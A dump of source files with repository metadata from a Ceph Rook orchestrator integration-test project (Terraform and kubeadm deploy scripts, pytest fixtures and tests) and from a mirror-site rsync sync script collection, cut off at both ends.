nc -z \"$1\" 22 ; do sleep 1 ; done\n" }, { "alpha_fraction": 0.6974790096282959, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 13.875, "blob_id": "708f45f5a072a79e33ef2c0a0ced0c037732e63b", "content_id": "d1e5727a40b23f57de92d39d5303dd466008912e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 238, "license_type": "no_license", "max_line_length": 25, "num_lines": 16, "path": "/tox.ini", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "[tox]\nenvlist = centos7\nskipsdist = True\n\n[testenv]\nbasepython = python3\nwhitelist_externals =\n terraform\n bash\n kubectl\npassenv=*\ndeps = -rrequirements.txt\ncommands=\n ./deploy-kubic.sh\n py.test {posargs}\n ./undeploy-kubic.sh\n" }, { "alpha_fraction": 0.7525773048400879, "alphanum_fraction": 0.7525773048400879, "avg_line_length": 18.399999618530273, "blob_id": "2e37ca2d9e908d80a74de603fc7b9d2b715dcd4a", "content_id": "fcf6203396aa513e5c220c4e181026b957b59b23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 97, "license_type": "no_license", "max_line_length": 37, "num_lines": 5, "path": "/deploy-rook-ceph.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -ex\n\nkubectl apply -f cluster-minimal.yaml\nkubectl apply -f toolbox.yaml\n" }, { "alpha_fraction": 0.6539456844329834, "alphanum_fraction": 0.6720569133758545, "avg_line_length": 30.571428298950195, "blob_id": "50423c81b7921b451f4ac3aa1a4019b23ce4d1b0", "content_id": "441d8c75dd6439c86732a46acd42394fec383566", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1546, "license_type": "no_license", "max_line_length": 158, "num_lines": 49, "path": "/deploy-kubic.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nset -ex\n\nwhich kubectl > /dev/null\nwhich terraform > /dev/null\n\nif [ \"$(kubectl get nodes | grep ' Ready ' | wc -l)\" == 3 ]\nthen\n echo -e \"\\e[91mWARNING: re-using exiting Kubernetes cluster.\\e[39m\"\n exit\nfi\n\npushd ./kubic-terraform-kvm\n\ntimeout 10m ./download-image.py\nterraform init\nterraform plan\nterraform apply -auto-approve\n./mk-ssh-config.sh\n\ntimeout 30 ../waitssh.sh $(terraform output -json | jq -r '.ips.value[0][]')\ncat <<'EOF' | ssh -F ssh_config $(terraform output -json | jq -r '.ips.value[0][]') 'bash -s'\nkubeadm init --cri-socket=/var/run/crio/crio.sock --pod-network-cidr=10.244.0.0/16\nmkdir -p $HOME/.kube\nsudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config\nsudo chown $(id -u):$(id -g) $HOME/.kube/config\nkubectl apply -f https://raw.githubusercontent.com/coreos/flannel/master/Documentation/kube-flannel.yml\nEOF\n\n\njoin_command=$(ssh -F ssh_config $(terraform output -json | jq -r '.ips.value[0][]') \"kubeadm token create --print-join-command\")\njoin_command=\"kubeadm join --cri-socket=/var/run/crio/crio.sock $(echo $join_command | python -c 'import sys; print(\" \".join(sys.stdin.read().split()[2:]))')\"\nssh -F ssh_config $(terraform output -json | jq -r '.ips.value[1][]') \"$join_command\"\nssh -F ssh_config $(terraform output -json | jq -r '.ips.value[2][]') \"$join_command\"\n\n\nscp -F ssh_config $(terraform output -json | jq -r '.ips.value[0][]'):~/.kube/config ~/.kube/config\n\n\ntimeout 5m bash <<'EOF'\nwhile [ \"$(kubectl get nodes | grep ' Ready ' | wc -l)\" != 3 ]\ndo\n 
sleep 1\ndone\nEOF\n\n\npopd" }, { "alpha_fraction": 0.6678956151008606, "alphanum_fraction": 0.6778218746185303, "avg_line_length": 37.74725341796875, "blob_id": "fd15b0e0b18417c1ddd5b484a58dfc94701072fc", "content_id": "ac5c6c906992089c286ad74fbcfe99a2ed773a87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3526, "license_type": "no_license", "max_line_length": 97, "num_lines": 91, "path": "/test_rook.py", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "import json\n\nimport pytest\nimport requests\n\nfrom fixtures import _orch_exec, _wait_for_condition, _service_exist, _ceph_exec, ceph_cluster, \\\n get_pods, pods_started, dashboard_url, dashboard_token_header\n\n\ndef test_status(ceph_cluster):\n _orch_exec('status')\n\ndef test_service_ls(ceph_cluster):\n svs = json.loads(_orch_exec('service ls --format=json'))\n assert len(svs) >= 2\n\n\ndef test_device_ls(ceph_cluster):\n svs = json.loads(_orch_exec('device ls --format=json'))\n assert len(svs) >= 2\n\n\ndef test_mon_update(ceph_cluster):\n assert len(get_pods(labels='app=rook-ceph-mon')) < 3\n _orch_exec('mon update 3')\n # Two checkpoints in order to keep the timeouts low:\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-mon')) >= 2)\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-mon')) == 3)\n\n\ndef test_osd_create(ceph_cluster):\n assert 'osd' not in _orch_exec('service ls')\n #_orch_exec('osd create kubic-1:vdb --encrypted=true')\n #_orch_exec('osd create kubic-2:vdb --osds-per-device=2')\n _orch_exec('osd create kubic-1:vdb')\n _orch_exec('osd create kubic-2:vdb')\n # Two checkpoints in order to keep the timeouts reasonable:\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-osd')) >= 1, timeout=180)\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-osd')) >= 2, timeout=120)\n #_wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-osd')) >= 3, timeout=120)\n _wait_for_condition(lambda: _service_exist('osd'))\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-osd'))\n\n\ndef test_nfs(ceph_cluster):\n assert _service_exist('osd')\n if not 'nfs-ganesha' in _ceph_exec('osd pool ls'):\n _ceph_exec(\"osd pool create nfs-ganesha 64\")\n assert not _service_exist('nfs')\n\n # TODO: test update_nfs_count\n\n _orch_exec(\"nfs add mynfs nfs-ganesha mynfs\")\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-nfs')) >= 1, timeout=120)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-nfs'), timeout=60)\n _wait_for_condition(lambda: _service_exist('nfs'))\n\n _orch_exec(\"nfs rm mynfs\")\n _wait_for_condition(lambda: not _service_exist('nfs'))\n _wait_for_condition(lambda: not get_pods(labels='app=rook-ceph-nfs'))\n\n\ndef test_mds(ceph_cluster):\n assert not _service_exist('mds')\n _ceph_exec('fs volume create myname')\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-mds')) == 2)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-mds'))\n _wait_for_condition(lambda: _service_exist('mds'))\n\n _ceph_exec('fs volume rm myname')\n _wait_for_condition(lambda: not _service_exist('mds'))\n _wait_for_condition(lambda: not get_pods(labels='app=rook-ceph-mds'))\n\n\n#@pytest.mark.skip(reason=\"needs image rebuild\")\ndef test_rgw(ceph_cluster):\n assert not _service_exist('rgw')\n _orch_exec(\"rgw add myrgw\")\n _wait_for_condition(lambda: len(get_pods(labels='app=rook-ceph-rgw')) >= 1, timeout=60)\n 
_wait_for_condition(lambda: pods_started(labels='app=rook-ceph-rgw'))\n _wait_for_condition(lambda: _service_exist('rgw'))\n\n _orch_exec(\"rgw rm myrgw\")\n _wait_for_condition(lambda: not _service_exist('rgw'))\n _wait_for_condition(lambda: not get_pods(labels='app=rook-ceph-rgw'))\n\n\ndef test_dashboard(ceph_cluster):\n url = f'{dashboard_url()}/api/summary'\n headers = dashboard_token_header(dashboard_url())\n requests.get(url, verify=False, headers=headers).raise_for_status()\n" }, { "alpha_fraction": 0.7368420958518982, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 9.666666984558105, "blob_id": "41cfdb6aeb8fe8eceb9c46bab36eb54d663cc354", "content_id": "9b7e17040a810bce4f9d505dcda860e30ae28cdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 95, "license_type": "no_license", "max_line_length": 31, "num_lines": 9, "path": "/undeploy-kubic.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nset -e\n\npushd ./kubic-terraform-kvm\n\nterraform destroy -auto-approve\n\npopd" }, { "alpha_fraction": 0.7101770043373108, "alphanum_fraction": 0.7101770043373108, "avg_line_length": 17.875, "blob_id": "6bb9d7b6b144874927105920c8a33c03f26fe213", "content_id": "ee042ef4b2304dd524479608470c3fee4f075f34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 452, "license_type": "no_license", "max_line_length": 93, "num_lines": 24, "path": "/README.md", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "# Test Ceph Rook Orchestrator \n\npy.test project to run an integration test of Ceph's mgr/rook module.\n\n## Requirements\n\n* from: [`kubic-terraform-kvm`](https://github.com/kubic-project/kubic-terraform-kvm)\n * `terraform`\n * [`terraform-provider-libvirt`](https://github.com/dmacvicar/terraform-provider-libvirt)\n* docker\n* kubectl\n* ssh\n \n## Configuration\n\nThis test deploys the minimal cluster.\n\n \n## Usage\n\nSimple, just run:\n```bash\ntox\n```" }, { "alpha_fraction": 0.7415730357170105, "alphanum_fraction": 0.7415730357170105, "avg_line_length": 14, "blob_id": "70e10a2f92eac5f231df84207ff630628fbf5c62", "content_id": "236d0ad4622b4dabf3b356510a1fdcf8055323c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 89, "license_type": "no_license", "max_line_length": 30, "num_lines": 6, "path": "/deploy-rook-operator.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nset -ex\n\nkubectl apply -f common.yaml\nkubectl apply -f operator.yaml" }, { "alpha_fraction": 0.6394995450973511, "alphanum_fraction": 0.6512957811355591, "avg_line_length": 33.32515335083008, "blob_id": "517c042c0c414395e1454ba2dbefb7610acec4eb", "content_id": "ccdcbf6975b845f47793e12352b0ed596bc4066b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5595, "license_type": "no_license", "max_line_length": 219, "num_lines": 163, "path": "/fixtures.py", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "import base64\nimport time\nfrom subprocess import check_output, CalledProcessError\nfrom typing import List\n\nimport requests\nimport yaml\nfrom kubernetes import client, config\n#from kubetest import utils, objects\n#from kubetest.client import TestClient\nfrom kubernetes.client 
import V1Pod, V1Service, V1ServicePort, V1Secret\nfrom pytest import fixture\n\nceph_image = 'ceph/daemon-base:latest-master'\n#ceph_image = '192.168.122.1:5000/ceph/ceph:latest'\n\ndef download_rook_manifests():\n def change_flexvolume(text):\n yamls = list(yaml.safe_load_all(text))\n for y in yamls:\n try:\n if y['metadata']['name'] == 'rook-ceph-operator':\n flex = dict(name='FLEXVOLUME_DIR_PATH', value=\"/var/lib/kubelet/volumeplugins\")\n y['spec']['template']['spec']['containers'][0]['env'].append(flex)\n except (KeyError, TypeError):\n pass\n try:\n y['spec']['cephVersion']['allowUnsupported'] = True\n y['spec']['cephVersion']['image'] = ceph_image\n except (KeyError, TypeError):\n pass\n return yaml.safe_dump_all(yamls)\n\n def download(name):\n url = 'https://raw.githubusercontent.com/rook/rook/master/cluster/examples/kubernetes/ceph/{}.yaml'.format(name)\n r = requests.get(url)\n r.raise_for_status()\n with open(name + '.yaml', 'w') as f:\n f.write(change_flexvolume(r.text))\n\n for name in ['common', 'operator', 'cluster-minimal', 'toolbox', 'dashboard-external-https']:\n download(name)\n\n# @fixture(scope='module')\ndef rook_operator():\n download_rook_manifests()\n\n if not get_pods(labels='app=rook-ceph-operator'):\n check_output('./deploy-rook-operator.sh')\n\n _wait_for_condition(lambda: get_pods(labels='app=rook-ceph-operator'), 240)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-operator'), 240)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-agent'), 240)\n _wait_for_condition(lambda: pods_started(labels='app=rook-discover'), 240)\n\n@fixture(scope='module')\ndef ceph_cluster():\n config.load_kube_config()\n rook_operator()\n\n check_output('kubectl apply -f cluster-minimal.yaml', shell=True)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-mon'), 240)\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-mgr'), 240)\n check_output('kubectl apply -f toolbox.yaml', shell=True) # now depends on running cluster.\n _wait_for_condition(lambda: pods_started(labels='app=rook-ceph-tools'), 240)\n _wait_for_condition(lambda: _service_exist('mon'))\n _wait_for_condition(lambda: _service_exist('mgr'))\n check_output('kubectl apply -f dashboard-external-https.yaml', shell=True)\n yield None\n check_output('./undeploy-rook-ceph.sh')\n\n\ndef _service_exist(name):\n try:\n return name in _orch_exec('service ls')\n except CalledProcessError:\n return False\n\ndef _orch_exec(cmd):\n return _ceph_exec('orchestrator ' + cmd)\n\n\ndef _ceph_exec(cmd):\n return _toolbox_exec('ceph ' + cmd)\n\n\ndef _toolbox_exec(cmd):\n return check_output(f\"\"\"timeout 60 kubectl -n rook-ceph exec -it $(kubectl -n rook-ceph get pod -l \"app=rook-ceph-tools\" -o jsonpath='{{.items[0].metadata.name}}') -- timeout 30 {cmd}\"\"\", shell=True).decode('utf-8')\n\n\ndef dashboard_url():\n service: V1Service = client.CoreV1Api().read_namespaced_service('rook-ceph-mgr-dashboard-external-https', 'rook-ceph')\n ports: List[V1ServicePort] = service.spec.ports\n\n mgr = get_pods(labels='app=rook-ceph-mgr')[0]\n return f'https://{mgr.status.host_ip}:{ports[0].node_port}'\n\n\ndef dashboard_password():\n s: V1Secret = client.CoreV1Api().read_namespaced_secret('rook-ceph-dashboard-password', 'rook-ceph')\n return base64.b64decode(s.data['password']).decode('utf-8')\n\n\ndef dashboard_token_header(url):\n r = requests.post(f'{url}/api/auth', json={'username': 'admin', 'password': dashboard_password()}, verify=False)\n return {'Authorization': f\"Bearer 
{r.json()['token']}\"}\n\n\ndef _wait_for_condition(condition, timeout=30):\n max_time = time.time() + timeout\n\n while True:\n if time.time() >= max_time:\n raise TimeoutError(\n 'timed out ({}s) while waiting for condition {}'\n .format(timeout, str(condition))\n )\n\n if condition():\n break\n\n time.sleep(1)\n\n\ndef get_pods(namespace='rook-ceph', fields: str=None, labels: str=None) -> List[V1Pod]:\n return client.CoreV1Api().list_namespaced_pod(\n namespace=namespace,\n **_field_labels_kwargs(fields, labels)\n ).items\n\n\ndef _field_labels_kwargs(fields, labels):\n kwargs = {}\n if fields:\n kwargs['field_selector'] = fields\n if labels:\n kwargs['label_selector'] = labels\n return kwargs\n\n\ndef containers_started(p: V1Pod):\n try:\n return all(cs.state.running.started_at is not None for cs in p.status.container_statuses)\n except (AttributeError, TypeError):\n return False\n\n\ndef pods_started(namespace='rook-ceph', fields: str=None, labels: str=None):\n pods = get_pods(namespace, fields=fields, labels=labels)\n if not pods:\n return False\n return all(containers_started(p) for p in pods)\n\n\nif __name__ == '__main__':\n config.load_kube_config()\n print(dashboard_url())\n print(dashboard_password())\n\n url = f'{dashboard_url()}/api/summary'\n headers = dashboard_token_header(dashboard_url())#\n\n requests.get(url, verify=False, headers=headers).raise_for_status()\n" } ]
10
kunalchamoli/vaccine_tracker
https://github.com/kunalchamoli/vaccine_tracker
588bb5a0fd9deb34961c9c2a7b7b23f7c736c456
70d7e968d6767d75b0a9436499b04ff0248de0c6
6a12016dff453badd6848cbfa9efd3b9df5c7e7d
refs/heads/main
2023-04-22T11:32:50.277487
2021-05-04T10:54:49
2021-05-04T10:54:49
364,223,300
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5848981142044067, "alphanum_fraction": 0.6012784838676453, "avg_line_length": 35.27536392211914, "blob_id": "9b405fc6c3154d07edfd5dec6c4d4ef9817d9e9f", "content_id": "973c45e2b694371f1b72720b9beecf623dd83823", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2503, "license_type": "no_license", "max_line_length": 151, "num_lines": 69, "path": "/first.py", "repo_name": "kunalchamoli/vaccine_tracker", "src_encoding": "UTF-8", "text": "import os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nimport time\n\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--headless\")\ndriver = webdriver.Chrome(executable_path=os.path.abspath(\"chromedriver.exe\"))\n\n\ndriver.get('https://www.cowin.gov.in/home')\ntime.sleep(2)\n\ninput = driver.find_element_by_css_selector('input#mat-input-0')\ninput.send_keys('302017')\ninput.send_keys(Keys.ENTER)\n\ntime.sleep(1)\nage_restrict = driver.find_elements_by_css_selector(\n 'div:nth-child(3) > label')[0]\nage_restrict.click()\n\n# hospitals = driver.find_element_by_id(\"slot-available-wrap\")\n# hospitals = driver.find_element_by_css_selector(\n# 'div:nth-child(1) > div > div > div.slot-available-main.col-padding.col.col-lg-9.col-md-9.col-sm-9.col-xs-12 > ul > li:nth-child(1)')\n\n# total_div = driver.find_elements_by_xpath(\n# '//div[@class=\"mat-main-field center-main-field\"]')\n\ntotal_div = driver.find_elements_by_xpath(\n '/html/body/app-root/div/app-home/div[2]/div/appointment-table/div/div/div/div/div/div/div/div/div/div/div[2]/form/div/div/div[6]/div/div/div/div')\n\nfor item in total_div:\n div1 = driver.find_elements_by_xpath('.//div[@class = \"row\"]')\n div2 = driver.find_elements_by_xpath(\n './/div[@class = \"col-sm-12 col-md-12 col-lg-12\"]')\n div3 = driver.find_elements_by_xpath(\n './/div[@class = \"main-slider-wrap col col-lg-3 col-md-3 col-sm-3 col-xs-12\"]')[0]\n\n print(div3.text)\n\n div4 = driver.find_elements_by_xpath(\n './/div[@class = \"main-slider-wrap col col-lg-3 col-md-3 col-sm-3 col-xs-12\"]')[1]\n slots = driver.find_elements_by_xpath(\n './/ul[@class = \"slot-available-wrap\"]//li')\n\n for item in slots:\n print('\\n')\n print(item.text)\n\n # for i in range(len(slots)):\n # try:\n # val = driver.find_elements_by_xpath(\n # './/div[@class = \"slots-box ng-star-inserted\"]')\n # a = 1\n # except Exception:\n # try:\n # val = driver.find_elements_by_xpath(\n # './/div[@class = \"slots-box no-available ng-star-inserted\"]')\n # b = 1\n # except Exception:\n # try:\n # val = driver.find_elements_by_xpath(\n # './/div[@class = \"slots-box no-seat ng-star-inserted\"]')\n # c = 1\n # except Exception:\n # pass\n" }, { "alpha_fraction": 0.6974865198135376, "alphanum_fraction": 0.7100538611412048, "avg_line_length": 24.9069766998291, "blob_id": "e8928668546a73101c9b32639960dbc601bfbf06", "content_id": "ea3b9516783b599ac36a0f9a59aa0e3a7f48bda0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1114, "license_type": "no_license", "max_line_length": 151, "num_lines": 43, "path": "/new.py", "repo_name": "kunalchamoli/vaccine_tracker", "src_encoding": "UTF-8", "text": "import os\nimport time\nfrom collections import defaultdict\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\n\n\noptions = Options()\noptions.headless 
= True\ndriver = webdriver.Chrome(executable_path=os.path.abspath(\n \"chromedriver.exe\"), options=options)\n\n\ndriver.get('https://www.cowin.gov.in/home')\ntime.sleep(2)\n\ninput = driver.find_element_by_css_selector('input#mat-input-0')\ninput.send_keys('302017')\ninput.send_keys(Keys.ENTER)\n\ntime.sleep(1)\nage_restrict = driver.find_elements_by_css_selector(\n 'div:nth-child(3) > label')[0]\nage_restrict.click()\n\n\ntotal_div = driver.find_elements_by_xpath(\n '/html/body/app-root/div/app-home/div[2]/div/appointment-table/div/div/div/div/div/div/div/div/div/div/div[2]/form/div/div/div[6]/div/div/div/div')\n\n\nfor item in total_div:\n print('\\n')\n div1 = item.find_elements_by_xpath('./div/div/div')\n\n hospital = div1[0].text\n print(hospital)\n\n slots = div1[1].find_elements_by_xpath('./ul/li')\n\n for elem in slots:\n print('\\n')\n print(elem.text)\n" } ]
2
UniqueStudio/mirrors-script
https://github.com/UniqueStudio/mirrors-script
cb3424ad78964bc39a8f4441ffe79f0474663a9d
56ad14401437f270ee718b5eb73baa7217fe5189
8277a49bda170bdb0a493720610d799279783b16
refs/heads/master
2021-01-20T09:09:29.664705
2013-12-28T12:25:59
2013-12-28T12:25:59
12,813,701
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7527352571487427, "alphanum_fraction": 0.7768052220344543, "avg_line_length": 40.54545593261719, "blob_id": "67219f303e0e651ab632293dadc6331cffe65f70", "content_id": "c429185eee8a08b252607b1eda523484e03cf079", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 457, "license_type": "no_license", "max_line_length": 184, "num_lines": 11, "path": "/syncbin/gentoo", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=gentoo\n_UPSTREAM=rsync://rsync1.cn.gentoo.org/$_REPO/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_RSYNC_ARGS=\"$_RSYNC_ARGS --exclude releases/.test/THIS-FILE-SHOULD-NOT-BE-PUBLIC.txt --exclude distfiles/.~tmp~\"\n_TIMESTAMP_PATHS=\"/distfiles/timestamp.chk,/experimental/timestamp.chk,/snapshots/portage-latest.tar.bz2.md5sum,/snapshots/portage-latest.tar.xz.md5sum,/releases/.timestamp-releases.x\"\n" }, { "alpha_fraction": 0.5221476554870605, "alphanum_fraction": 0.5382550358772278, "avg_line_length": 18.102563858032227, "blob_id": "827f71ad18024bf010a0f8940c3b9f2499f6fd0b", "content_id": "02efd868f49294021f1292abdba55213c3ae2465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 745, "license_type": "no_license", "max_line_length": 67, "num_lines": 39, "path": "/syncbin/rubygems", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_sync() {\n HOME=/home/mirror\n gem mirror\n HOME=/root\n RETVAL=$?\n cd $OWD\n return $RETVAL\n}\n\n_get_upstream() {\n echo \"https://production.cf.rubygems.org/\"\n}\n\n_get_next_sync_time() {\n _CURTIME=`date +%s`\n _DELTA=900\n echo $(( $_CURTIME + $_DELTA ))\n}\n\n_get_size() {\n OLD=$(kvdb_local_get last_du_time)\n if [ \"0$OLD\" -eq \"0\" ]; then\n OLD=0\n fi\n NOW=`date +%s`\n let P=NOW-OLD\n if [ \"$P\" -lt \"86400\" ]; then\n kvdb_local_get last_du_value\n else\n NSIZE=`du \"$MIRRORROOT/rubygems\" -sh | awk '{ print $1; }'`\n kvdb_local_set last_du_value \"$NSIZE\"\n kvdb_local_set last_du_time \"$NOW\"\n echo \"$NSIZE\"\n fi\n}\n" }, { "alpha_fraction": 0.7305389046669006, "alphanum_fraction": 0.7784430980682373, "avg_line_length": 17.44444465637207, "blob_id": "473575f2c87c4e18ec4f5a2902f3bec1e43dd7cc", "content_id": "8180350ddc8c728207114bfd6a7489e24ff39f2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 167, "license_type": "no_license", "max_line_length": 50, "num_lines": 9, "path": "/syncbin/linuxmint", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=linuxmint\n_UPSTREAM=rsync://packages.linuxmint.com/packages/\n_SYNCEVERY=7200\n_FAILRETRY=600\n_FAILRETRIES=4\n\n" }, { "alpha_fraction": 0.7197802066802979, "alphanum_fraction": 0.7582417726516724, "avg_line_length": 17.200000762939453, "blob_id": "0b1ef9327a26b6ad39238105fe8046ef8677b1a1", "content_id": "d44c0f8f270a74714389b3acff53dc8085c6493e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 182, "license_type": "no_license", "max_line_length": 45, "num_lines": 10, "path": "/syncbin/centos", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource 
$SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=centos\n_UPSTREAM=rsync://us-msync.centos.org/CentOS/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/TIME\"\n" }, { "alpha_fraction": 0.6331236958503723, "alphanum_fraction": 0.6373165845870972, "avg_line_length": 42.3636360168457, "blob_id": "01c7eefdc0ddedff241f901f25f34697b81f0d79", "content_id": "61a1780913cb78b073c4f2244c808f14ee2b04d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 477, "license_type": "no_license", "max_line_length": 103, "num_lines": 11, "path": "/gen_rsyncd", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\nMIRRORDATA=\"/home/mirror/mirrordata\"\necho -e \"# This file will be overwritten by gen_rsyncd script.\\n# Do NOT modify by hand.\" > rsyncd.conf\ncat rsyncd.conf.header >> rsyncd.conf\nfor i in `ls $MIRRORDATA/`; do\n echo \"[$i]\" >> rsyncd.conf\n echo \"path = $MIRRORDATA/$i\" >> rsyncd.conf\n SIZE=$( cat /home/mirror/mirrorweb/status/${i}.json | egrep -o '\"[0-9.]+[TKMG]\"' | tr -d '\"' )\n echo \"comment = size: $SIZE\" >> rsyncd.conf\n echo >> rsyncd.conf\ndone\n" }, { "alpha_fraction": 0.7197802066802979, "alphanum_fraction": 0.7582417726516724, "avg_line_length": 17.200000762939453, "blob_id": "bf7c92a7c9e283997d9e5ea03803ff366f35081d", "content_id": "aa48e78c38fba2128d2faa149ea9a22e93e19be0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 182, "license_type": "no_license", "max_line_length": 38, "num_lines": 10, "path": "/syncbin/xbmc", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource $SCRIPTROOT/syncbin/.rsync_base\n\n_REPO=xbmc\n_UPSTREAM=rsync://rsync.xbmc.org/euro/\n_SYNCEVERY=600\n_FAILRETRY=600\n_FAILRETRIES=4\n_TIMESTAMP_PATHS=\"/timestamp.txt\"\n" }, { "alpha_fraction": 0.6080368757247925, "alphanum_fraction": 0.6280193328857422, "avg_line_length": 34.85039520263672, "blob_id": "f1df85d15f3879542f4c242938a1aea44a6dceb3", "content_id": "817ef66277fc7b5a4cf29db7583cd76a6cb5b776", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4554, "license_type": "no_license", "max_line_length": 159, "num_lines": 127, "path": "/sync_core", "repo_name": "UniqueStudio/mirrors-script", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nSERVERNAME=$( hostname --fqdn ) # added a space before `)' to fix vim syntax highlighting issue\n\nfunction kvdb_global_get_file_name() {\n DBF=\"$KVDBROOT/global.kc\"\n if [[ ! -f \"$DBF\" ]]; then\n kchashmgr create \"$DBF\" 2>/dev/null\n fi\n echo \"$DBF\"\n}\n\nfunction kvdb_local_get_file_name() {\n DBF=\"$KVDBROOT/local.$DISTRO.kc\"\n if [[ ! 
-f \"$DBF\" ]]; then\n kchashmgr create \"$DBF\" 2>/dev/null\n fi\n echo \"$DBF\"\n}\n\nfunction kvdb_global_get() {\n DBF=$(kvdb_global_get_file_name)\n kchashmgr get \"$DBF\" \"$1\" 2>/dev/null\n}\n\nfunction kvdb_global_set() {\n DBF=$(kvdb_global_get_file_name)\n kchashmgr set \"$DBF\" \"$1\" \"$2\" 2>/dev/null\n}\n\nfunction kvdb_global_remove() {\n DBF=$(kvdb_global_get_file_name)\n kchashmgr remove \"$DBF\" \"$1\" 2>/dev/null\n}\n\nfunction kvdb_global_clear() {\n DBF=$(kvdb_global_get_file_name)\n kchashmgr clear \"$DBF\" 2>/dev/null\n}\n\nfunction kvdb_local_get() {\n DBF=$(kvdb_local_get_file_name)\n kchashmgr get \"$DBF\" \"$1\" 2>/dev/null\n}\n\nfunction kvdb_local_set() {\n DBF=$(kvdb_local_get_file_name)\n kchashmgr set \"$DBF\" \"$1\" \"$2\" 2>/dev/null\n}\n\nfunction kvdb_local_remove() {\n DBF=$(kvdb_local_get_file_name)\n kchashmgr remove \"$DBF\" \"$1\" 2>/dev/null\n}\n\nfunction kvdb_local_clear() {\n DBF=$(kvdb_local_get_file_name)\n kchashmgr clear \"$DBF\" 2>/dev/null\n}\n\nsource \"$SCRIPTROOT/syncbin/$1\"\n\nGenJSON='import json;from itertools import izip;import sys;i=iter(sys.argv[1:]);print json.dumps(dict(izip(i,i)))'\n\nSIZE=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"size\" in p and p[\"size\"] or -1')\nLASTSYNC=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"lastsync\" in p and p[\"lastsync\"] or -1')\nNEXTSYNC=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"nextsync\" in p and p[\"nextsync\"] or -1')\nLASTSTATUS=$(cat \"$STATUSROOT/$1.json\" | python -c 'import json;p=json.loads(raw_input());print \"status\" in p and p[\"status\"] or -1')\nUPSTREAM=$(_get_upstream)\n\npython -c \"$GenJSON\" upstream \"$UPSTREAM\" size 